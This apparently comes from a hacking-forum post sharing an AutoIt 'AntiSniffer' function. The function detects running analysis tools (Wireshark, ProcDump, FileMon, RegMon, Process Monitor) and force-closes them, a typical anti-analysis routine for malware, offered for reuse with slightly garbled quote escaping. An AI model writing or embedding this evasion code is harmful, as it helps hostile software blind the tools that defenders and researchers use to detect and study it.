13 Years of Service
24%
AntiSniffer in AutoIT
Code:
> ;# $antisniffer = 1 Active
Func _antisniffer($antisniffer)
If $antisniffer = 1 Then
If ProcessExists("wireshark.exe\") Then ; WireShark
ProcessClose(\"wireshark.exe\")
EndIf
If ProcessExists(\"procdump.exe\") Then
ProcessClose(\"procdump.exe\")
EndIf
If ProcessExists(\"FileMon.exe\") Then
ProcessClose(\"FileMon.exe\")
EndIf
If ProcessExists(\"regmon.exe\") Then
ProcessClose(\"regmon.exe\")
EndIf
If ProcessExists(\"procmon.exe\") Then
ProcessClose(\"procmon.exe\")
EndIf
EndIf
EndFunc